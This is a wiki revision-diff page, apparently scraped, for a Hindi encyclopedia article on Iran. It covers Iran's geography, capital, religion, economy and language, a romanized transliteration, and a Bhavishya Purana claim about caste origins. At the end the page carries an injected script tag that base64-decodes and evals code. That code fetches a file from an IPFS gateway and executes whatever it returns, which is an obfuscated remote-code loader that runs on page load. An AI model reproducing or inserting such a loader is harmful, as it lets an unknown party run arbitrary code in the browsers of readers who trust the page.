Difference between revisions of "ईरान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m
Line 1: Line 1:
ईरान, [[जंबुद्वीप]] ([[एशिया]]) के दक्षिण-पश्चिम खंड में स्थित देश है। ईरान को सन [[1935]] तक फारस नाम से भी जाना जाता है। ईरान  देश उत्तर-पूर्व में [[तुर्कमेनिस्तान]], उत्तर में कैस्पियन सागर और अज़रबैजान, दक्षिण में [[फारस की खाड़ी]], पश्चिम में [[इराक]] और [[तुर्की]], पूर्व में [[अफ़ग़ानिस्तान]] तथा [[पाकिस्तान]] से घिरा है । ईरान की राजधानी [[तेहरान]] है। यहाँ का प्रमुख धर्म [[इस्लाम]] है तथा यह क्षेत्र शिया बहुल है ।
+
ईरान, [[जंबुद्वीप]] ([[एशिया]]) के दक्षिण-पश्चिम खंड में स्थित देश है। ईरान को सन [[1935]] तक फारस नाम से भी जाना जाता है। ईरान  देश उत्तर-पूर्व में [[तुर्कमेनिस्तान]], उत्तर में कैस्पियन सागर और अज़रबैजान, दक्षिण में [[फारस की खाड़ी]], पश्चिम में [[इराक]] और [[तुर्की]], पूर्व में [[अफ़ग़ानिस्तान]] तथा [[पाकिस्तान]] से घिरा है । ईरान की राजधानी [[तेहरान]] है। यहाँ का प्रमुख धर्म [[इस्लाम]] है तथा यह क्षेत्र [[शिया]] बहुल है ।
  
 
ईरान प्राचीन काल में बड़े साम्राज्यों की भूमि रह चुका है। सन 1979 ई. में  ईरान को इस्लामिक गणराज्य घोषित किया गया था। ईरान के प्रमुख शहर तेहरान, [[इस्फ़हान]], [[तबरेज़]], [[मशहद]] इत्यादि हैं। ईरान की राजधानी तेहरान में देश की 15 प्रतिशत जनता वास करती है। ईरान की अर्थव्यवस्था मुख्यतः तेल और प्राकृतिक गैस निर्यात पर निर्भर है। [[फ़ारसी भाषा|फ़ारसी भाषा]] यहाँ की मुख्य भाषा है। ईरान के हखामनी शासन-काल में संपूर्ण पश्चिम एशिया में [[आरमेई भाषा]] तथा लिपि का प्रचार था।
 
ईरान प्राचीन काल में बड़े साम्राज्यों की भूमि रह चुका है। सन 1979 ई. में  ईरान को इस्लामिक गणराज्य घोषित किया गया था। ईरान के प्रमुख शहर तेहरान, [[इस्फ़हान]], [[तबरेज़]], [[मशहद]] इत्यादि हैं। ईरान की राजधानी तेहरान में देश की 15 प्रतिशत जनता वास करती है। ईरान की अर्थव्यवस्था मुख्यतः तेल और प्राकृतिक गैस निर्यात पर निर्भर है। [[फ़ारसी भाषा|फ़ारसी भाषा]] यहाँ की मुख्य भाषा है। ईरान के हखामनी शासन-काल में संपूर्ण पश्चिम एशिया में [[आरमेई भाषा]] तथा लिपि का प्रचार था।

Revision as of 12:28, 18 May 2011

eeran, janbudvip (eshiya) ke dakshin-pashchim khand mean sthit desh hai. eeran ko san 1935 tak pharas nam se bhi jana jata hai. eeran desh uttar-poorv mean turkamenistan, uttar mean kaispiyan sagar aur azarabaijan, dakshin mean pharas ki kha di, pashchim mean irak aur turki, poorv mean afaganistan tatha pakistan se ghira hai . eeran ki rajadhani teharan hai. yahaan ka pramukh dharm islam hai tatha yah kshetr shiya bahul hai .

eeran prachin kal mean b de samrajyoan ki bhoomi rah chuka hai. san 1979 ee. mean eeran ko islamik ganarajy ghoshit kiya gaya tha. eeran ke pramukh shahar teharan, isfahan, tabarez, mashahad ityadi haian. eeran ki rajadhani teharan mean desh ki 15 pratishat janata vas karati hai. eeran ki arthavyavastha mukhyatah tel aur prakritik gais niryat par nirbhar hai. farasi bhasha yahaan ki mukhy bhasha hai. eeran ke hakhamani shasan-kal mean sanpoorn pashchim eshiya mean arameee bhasha tatha lipi ka prachar tha.

'bhavishy puran' ke anusar varn-vyavastha eeran ke brahmanoan ki den hai. unhoanne hi brahman, kshatriy, vaishy aur shoodr jatiyoan mean samaj ko baanta tha. yah nirvivad roop se saty hai ki eerani purohit mag jyotish vidya mean parangat the. mag brahmanoan ke atirikt bhojak aur agni upasak bhi eeran se yahaan ae the, jo bad mean 'ary' kahalane lage.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>